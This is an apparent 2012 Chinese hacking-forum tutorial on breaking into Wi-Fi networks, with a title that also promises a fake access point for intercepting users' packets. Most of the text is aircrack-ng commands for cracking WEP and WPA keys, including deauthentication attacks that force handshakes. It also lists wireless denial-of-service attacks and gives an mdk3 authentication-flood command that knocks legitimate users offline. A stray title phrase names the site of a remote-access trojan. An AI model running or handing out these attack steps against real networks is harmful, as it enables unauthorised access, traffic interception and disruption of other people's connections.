|
偽造目標(biāo)ap,截取合法用戶數(shù)據(jù)包,分析獲得wifi密碼 灰鴿子官網(wǎng)
00x01 介紹
不管使用什么系統(tǒng),一定要把網(wǎng)卡激活成為monitor模式,這樣軟件才可以識(shí)別
iwconfig //查看網(wǎng)卡
ifconfig start wlan0 //啟動(dòng)wlan0網(wǎng)卡
airmon-ng start wlan0 //將網(wǎng)卡激活成monitor模式,一般為mon0
WEP
airodump-ng --ivs –w log –c頻道wlan0 //wep用ivs過(guò)濾報(bào)文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr來(lái)迅速加大數(shù)據(jù)量
aircrack-ng ivs文件 //破解捕獲來(lái)的ivs文件 wep用這幾個(gè)命令足以了
WPA/WPA2
airodump-ng –c頻道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //發(fā)動(dòng)Deauth攻擊獲取完整的handshake 提示獲取成功,即可破解抓來(lái)的數(shù)據(jù)包
aircrack-ng –w字典文件捕獲的cap文件 //WPA破解完全靠字典,需要有耐心
其實(shí)說(shuō)到這里,hash破解速錄會(huì)大大提升,只是利用字典制作hash table的時(shí)候需要花好長(zhǎng)的時(shí)間,但是破解是aircrack的幾十倍.
常見(jiàn)的幾種DOS攻擊:
Authentication Flood、Deauthentication Flood、Disassociation Flood、RF Jamming、Association Flood等
00x02 利用工具
本次我們還是依賴于BT5下一款強(qiáng)大的工具,mdk3
現(xiàn)在大部分無(wú)線下的工具都是利用mdk3為基本內(nèi)核來(lái)開(kāi)發(fā)的,所以其性能就不用多說(shuō)了.
針對(duì)路由器,我們可以發(fā)動(dòng)Authentication Flood,mdk3下參數(shù)為a,此攻擊是針對(duì)無(wú)線AP的洪水攻擊,
又叫做身份驗(yàn)證攻擊.其原理就是向AP發(fā)動(dòng)大量的虛假的鏈接請(qǐng)求,這種請(qǐng)求數(shù)量一旦超過(guò)了無(wú)線AP所能承受的范圍,
AP就會(huì)自動(dòng)斷開(kāi)現(xiàn)有鏈接,使合法用戶無(wú)法使用無(wú)線網(wǎng)絡(luò)
mdk3 mon0 a –a AP的MAC地址(BSSID)
2.jpg (74.49 KB, 下載次數(shù): 658)
下載附件
黑客
2012-12-19 21:43 上傳
|
|